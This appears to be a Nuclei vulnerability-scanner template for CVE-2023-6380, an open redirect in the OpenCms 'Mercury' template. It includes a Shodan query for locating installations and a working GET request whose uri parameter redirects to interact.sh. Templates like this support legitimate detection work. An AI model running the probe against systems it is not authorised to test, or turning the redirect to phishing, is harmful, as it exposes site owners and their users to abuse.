31 lines
1.1 KiB
YAML
31 lines
1.1 KiB
YAML
id: CVE-2023-6380
|
|
|
|
info:
|
|
name: OpenCms 14 & 15 - Open Redirect
|
|
author: MiguelSegoviaGil
|
|
severity: medium
|
|
description: |
|
|
Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template
|
|
reference:
|
|
- https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-6380
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: "/opencms/"
|
|
verified: true
|
|
tags: cve,cve2023,redirect,opencms
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&fallbackLocale&locale=en&rows=1&uri=http://interact.sh"
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: header
|
|
regex:
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
|
# digest: 4a0a00473045022100920893b684b25dc5343c4d247f160727f7907c192699ec33701749a0314f3698022026ada7574904497d60f6801cdabcce800670aa50222133c0b2890af6aee3253a:922c64590222798bb761d5b6d8e72950 |